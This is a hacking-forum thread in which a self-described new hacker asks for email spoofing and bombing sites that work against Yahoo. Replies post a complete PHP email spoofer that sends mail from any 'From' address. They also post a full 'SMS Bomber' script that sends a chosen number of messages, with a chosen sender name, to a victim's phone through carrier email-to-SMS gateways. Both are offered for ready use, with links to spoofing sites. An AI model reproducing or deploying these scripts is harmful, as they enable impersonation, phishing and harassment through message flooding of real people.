any1 got sites for email spoof
im pretty new to online hacking and hellbound. Im really interested and i think im gonna be great. (i got 149 iq level lol).ive been hacking games and mmorpg and stuff for a couple years with chea engine so i learned alot from that. i know html =). ive been fairly interest in the email spoof, but the telnet way doesnt work. so ive been using sites. arabian-outlaw.com <this doesnt work… zomgz.info their bomber works but yahoo doesnt work nodemise.com <doesnt work blackdash.com < under construction so i dont know
so i need help wit getting a spoofer/bomber which works with yahoo as welll and actually work…
the other day i found one but i forgot the link. so my forum brothers please help me. i have notice that this forum is one of the most freindly ones there is.
MAY ALL HACKERS LIFE LONG!!!!!!!!!!!:D
go to w3schools.com or just google it. w3schools, though, is one of the best places for learning web languages. It's where I learned javascript and what I currently know about SQL, as well as some more advanced HTML. It has a very good tutorial on PHP, I'm sure you'll find what you're looking for there. PHP is one of the best ways to spoof email; I've tried telnet to yahoo, too, but its pop3 and not smtp; you have to have an smtp server to forge in telnet.
There might be a way to trick yahoo into accepting smtp; I use yPOPs! to get my Yahoo email in Thunderbird, and I can send through my yahoo account without actually using yahoo. What you want to do is most likely going to be done through PHP, unless you want to spend a long time trying other routes… which, of course, is a good learning experience too! But, yeah, basically PHP would be the way to go.
To learn PHP your gonna want www.phpfreaks.com always a good place to start.. and to learn, and advance ;)
if(isset($_POST['submit'])) {
$to = $_REQUEST['tomail'];
$frommail = $_REQUEST['frommail'] ;
$subject = $_REQUEST['subject'] ;
$message = $_REQUEST['message'] ;
$headers = "From: $frommail";
$sent = mail($to, $subject, $message, $headers) ;
if($sent){
print "Your mail was sent successfully";
}else{
print "We encountered an error sending your mail";
}
}else{
print"<form name=\"contact\" method=\"post\" action=\"spoof.php\">
<p>
<label for=\"email\">To Email :</label>
<input type=\"text\" name=\"tomail\" class=\"textinput\" value=\"\" />
<br>
<label for=\"email\">From Email :</label>
<input type=\"text\" name=\"frommail\" class=\"textinput\" value=\"\" />
<br>
<label for=\"subject\">Subject :</label>
<input type=\"text\" name=\"subject\" class=\"textinput\" value=\"\" />
<br>
<label for=\"message\">Message :</label>
<textarea name=\"message\" cols=\"40\" rows=\"10\" class=\"textinput\"></textarea><br>
<input name=\"submit\" type=\"submit\" value=\"send\" id=\"submit\" class=\"buttonSubmit\">
</p>
</form>";
}
?> ```
there u go
p.s. arabian-outlaw.com hasnt been updated in almost a year now
even tho that was my first ever website lol makes me proud
or if your feeling classy why not an sms bomber? lol
<html>
<head>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8'>
<title>SMS Bomber by sleazoid</title>
<style type='text/css'>
body {
font-size: 15px;
font-family: Tahoma;
width: 500px;
color: 06666;
margin: auto auto;
padding-top: 10px;
}
div.head {
font-weight: bolder;
color: 04466;
}
input.main {
border-color: 06666;
border-width: 1px;
border-style: solid;
font-family: Tahoma;
height: 20px;
font-size: 15px;
color: 04466;
}
input.submit {
background-color: #FFFFFF;
border-color: 06666;
border-width: 1px;
border-style: solid;
font-family: Tahoma;
height: 20px;
font-size: 15px;
color: 06666;
}
textarea.main {
border-color: 06666;
border-width: 1px;
border-style: solid;
font-family: Tahoma;
font-size: 15px;
color: 04466;
}
select.main {
border-color: 06666;
border-width: 1px;
border-style: solid;
font-family: Tahoma;
font-size: 15px;
color: 04466;
}
div.italic {
font-style: italic;
}
div.sent {
font-weight: bolder;
}
#form input#to1:focus, input#to2:focus, input#to3:focus, input#from:focus, input#subject:focus, textarea#mess:focus, input#amount:focus {
background-color: #EEEEEE;
font-family: Tahoma;
font-size: 15px;
color: 04466;
}
</style>
</head>
<body>
<div class='head'>SMS Bomber by sleazoid</div>
<br />
<?
$Blocked_number = "5555555555";
if (!$_POST['send']) {
echo ("
<form method='post' id='form' action=''>
Number:
<br />
<input type='text' maxlength='3' onblur=\"if(this.value=='') this.value='555';\" onfocus=\"if(this.value=='555') this.value='';\" name='to1' class='main' value='555' id='to1' size='2' onkeypress='var k = event.keyCode ? event.keyCode : event.charCode ? event.charCode : event.which; return /[^A-Za-z]/.test( String.fromCharCode(k) );'> -
<input type='text' maxlength='3' onblur=\"if(this.value=='') this.value='555';\" onfocus=\"if(this.value=='555') this.value='';\" name='to2' class='main' value='555' id='to2' size='2' onkeypress='var k = event.keyCode ? event.keyCode : event.charCode ? event.charCode : event.which; return /[^A-Za-z]/.test( String.fromCharCode(k) );'> -
<input type='text' maxlength='4' onblur=\"if(this.value=='') this.value='5555';\" onfocus=\"if(this.value=='5555') this.value='';\" name='to3' class='main' value='5555' id='to3' size='2' onkeypress='var k = event.keyCode ? event.keyCode : event.charCode ? event.charCode : event.which; return /[^A-Za-z]/.test( String.fromCharCode(k) );'>
<br />
Carrier:
<br />
<select class='main' name='carrier' id='carrier'>
<option>ALL</option>
<option>tmobile</option>
<option>cingular</option>
<option>virgin-mobile</option>
<option>sprint</option>
<option>verizon</option>
<option>nextel</option>
<option>att</option>
<option>boost-mobile</option>
<option>alltel</option>
<option>optus</option>
</select>
<br />
From:
<br />
<input type='text' onblur=\"if(this.value=='') this.value=' From';\" onfocus=\"if(this.value==' From') this.value='';\" name='from' class='main' value=' From' id='from'>
<br />
Subject:
<br />
<input type='text' onblur=\"if(this.value=='') this.value=' Subject';\" onfocus=\"if(this.value==' Subject') this.value='';\" name='sub' class='main' value=' Subject' id ='subject'>
<br />
Message:
<br />
<textarea name='mess' class='main' onblur=\"if(this.value=='') this.value=' Your Message';\" onfocus=\"if(this.value==' Your Message') this.value='';\" cols='45' rows='10' id='mess'> Your Message</textarea>
<br />
<label for='amount'>Amount to Send: </label>
<br />
<input type='text' onblur=\"if(this.value=='') this.value=' Amount';\" onfocus=\"if(this.value==' Amount') this.value='';\" name='amount' class='main' value=' Amount' id='amount'>
<br />
<br />
<input type='submit' name='send' value='Send' class='submit'>
</form>");
} else {
if (isset($_POST['amount']) && (!is_numeric($_POST['amount']))){
echo "
<b>Invalid Request.</b>
<br/>
<br />
<input type='submit' value='Try Again' onClick='javascript:history.go(-1)' class='submit'>";
exit;
}
if ($_POST['sub'] == " Subject" OR $_POST['mess'] == " Your Message" OR $_POST['from'] == " From" OR $_POST['amount'] == " Amount"){
echo "
<b>Invalid Request.</b>
<br />
<br />
<input type='submit' value='Try Again' onClick='javascript:history.go(-1)' class='submit'>";
exit;
}
if (!is_numeric($_POST['to1']) OR !is_numeric($_POST['to2']) OR !is_numeric($_POST['to3'])) {
echo "
<b>Invalid Request.</b>
<br />
<br />
<input type='submit' value='Try Again' onClick='javascript:history.go(-1)' class='submit'>";
exit;
}
if ("$to1$to2$to3" == '$Blocked_number') {
echo "
<b>Invalid Request.</b>
<br />
<br />
<input type='submit' value='Try Again' onClick='javascript:history.go(-1)' class='submit'>";
exit;
}
$to1 = stripslashes($_POST['to1']);
$to2 = stripslashes($_POST['to2']);
$to3 = stripslashes($_POST['to3']);
$sub = stripslashes($_POST['sub']);
$mess = nl2br(stripslashes($_POST['mess']));
$carrier = stripslashes($_POST['carrier']);
$from1 = stripslashes($_POST['from']);
$from = "$from1@mobile.com <$from1@mobile.com>";
$amount = stripslashes($_POST['amount']);
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-Type: text/html; charset="iso-8859-1" ' . "\r\n";
$headers .= 'Content-Transfer-Encoding: 8bit' . "\r\n";
$headers .= "from: ".$from;
if ($carrier == cingular) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@cingularme.com", "$sub", $mess, $headers);
}
} elseif ($carrier == tmobile) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@tmomail.net", "$sub", $mess, $headers);
}
}
if ($carrier == virgin-mobile) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@vmobl.com", "$sub", $mess, $headers);
}
} elseif ($carrier == sprint) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@messaging.sprintpcs.com", "$sub", $mess, $headers);
}
}
if ($carrier == verizon) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@vtext.com", "$sub", $mess, $headers);
}
} elseif ($carrier == nextel) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@messaging.nextel.com", "$sub", $mess, $headers);
}
}
if ($carrier == att) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@mms.att.net", "$sub", $mess, $headers);
}
} elseif ($carrier == boost-mobile) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@myboostmobile.com", "$sub", $mess, $headers);
}
}
if ($carrier == alltel) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@message.alltel.com", "$sub", $mess, $headers);
}
} elseif ($carrier == optus) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@optusmobile.com.au", "$sub", $mess, $headers);
}
}
if ($carrier == ALL) {
for ($i=1; $i<=$amount; $i++){
mail("$to1$to2$to3@cingularme.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@tmomail.net", "$sub", $mess, $headers);
mail("$to1$to2$to3@vmobl.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@messaging.sprintpcs.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@vtext.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@messaging.nextel.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@mms.att.net", "$sub", $mess, $headers);
mail("$to1$to2$to3@myboostmobile.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@message.alltel.com", "$sub", $mess, $headers);
mail("$to1$to2$to3@optusmobile.com.au", "$sub", $mess, $headers);
}
}
$mess_echo = str_ireplace("<br />", "|", "$mess");
$to = "$to1-$to2-$to3";
echo ("
<div class='italic'>Your SMS has been sent <b>".$amount."</b> times!</div>
<br />
To: <div class='sent'>".htmlentities($to)."</div>
<br />
From: <div class='sent'>".htmlentities($from1)."</div>
<br />
Subject: <div class='sent'>".htmlentities($sub)."</div>
<br />
Message: <div class='sent'>".htmlentities($mess_echo)."</div>
<br />
<br />
<br />
<input type='submit' value='Send More' onClick='javascript:history.go(-1)' class='submit'>
<br />
<br />");
}
?>
</body>
</html>```
and netfish is my pope
go here http://www.notepage.net/smtp.htm
and im sure you can figure out how to add more carriers to the script, if not you dont deserve to use it
:)